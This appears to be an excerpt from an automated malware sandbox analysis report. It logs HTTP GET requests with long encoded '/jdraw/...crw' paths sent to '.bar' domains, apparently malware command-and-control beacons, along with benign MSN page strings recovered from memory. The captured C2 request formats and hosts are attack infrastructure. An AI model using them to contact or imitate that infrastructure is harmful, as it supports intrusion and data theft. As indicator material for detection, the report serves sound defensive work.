HTTP traffic detected: GET /jdraw/T1Oye5dXOyO7X2/W2Jf88M5e37Kz6KOh7AdL/wY5JZWvpnXF42vVg/l7s4mKoV_2FqPNE/dhTHk84TOdHYwxXQ3F/ZDAxuudp3/D1Qs8omUsHmDB_2FVyG9/fdORbAiNcjwPXWrQQ0O/25Y_2BweBhA69miE0hz3Mk/RqfVs38U7EbR6/7NRpQCUV/WpJhqepI5X3UmOUCA7tjaJ_/2FPWDLDzx0/6EjYsFZMbGs/q1m.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.alliancer.bar |
Source: global traffic |
HTTP traffic detected: GET /jdraw/6t2TJPVp8r4_2Fuvh2KKhY/8YV_2B_2BRJ82/6nGE2eYA/7HHAwpkhVWuf8lW4yXxIq9d/P3s_2FZHKD/oMUCAMgfPleHjs4l4/0BIh2qxT_2F_/2BqGTGuBqqr/qMuHIfbg722ygV/LdYTIqTAwZMOjKPe_2BwH/och7PytHC76QFgMR/zdGw0_2FoGJ7HxL/0oDAmIcPbJn2gUolv1/8hw0Ffgg.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.alliancer.bar |
Source: global traffic |
HTTP traffic detected: GET /jdraw/cryAR_2BXe/tfZsZbCTIFSKEc_2F/fRFkFMDrwQ2J/nrfzPEYzAHe/Wx7an4ijbM8zE_/2FhpezUV4yO_2FfukN7U6/uBGYkZ4E31D33UZI/2HgOfw9U8TtlGcU/RO3AW2pv4UBCdojWiG/XAiw8U4II/LFIW7fzb6NeZ11ktdY_2/BmSX_2BpD6QEHKNSkw3/GsrABMXgDqbSFWjB/BiqFiS.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: allianceline.barConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /jdraw/cryAR_2BXe/tfZsZbCTIFSKEc_2F/fRFkFMDrwQ2J/nrfzPEYzAHe/Wx7an4ijbM8zE_/2FhpezUV4yO_2FfukN7U6/uBGYkZ4E31D33UZI/2HgOfw9U8TtlGcU/RO3AW2pv4UBCdojWiG/XAiw8U4II/LFIW7fzb6NeZ11ktdY_2/BmSX_2BpD6QEHKNSkw3/GsrABMXgDqbSFWjB/BiqFiS.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.allianceline.bar |
Source: global traffic |
HTTP traffic detected: GET /jdraw/TAmAcu8EQ5dbq_2FLn/jmsAPZU0N/O3d42v1YOxC8LCsNcUdI/hBRtAVsuP0wmqk3iAnH/V7a2yIwEeWGhi2w2781UJd/XfMuL5OGMx46D/tX7UDvFf/Y_2BiaZRVpr3DW0jCRNM81D/ubtn4Y0mDo/Zf69CqE_2FlQ0hZy6/_2B_2BpRSoEQ/klrzoZkO8B_/2BwdYmhPaHQxFS/cUtgYxD_2/F.crw HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: alliances.barConnection: Keep-Alive |
Source: de-ch[1].htm.8.dr |
String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook) |
Source: de-ch[1].htm.8.dr |
String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail) |
Source: 52-478955-68ddb2ab[1].js.8.dr |
String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter) |
Source: de-ch[1].htm.8.dr |
String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+" Ref 2: "+e.html(t.clientSettings.sid||"000000")+" Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in |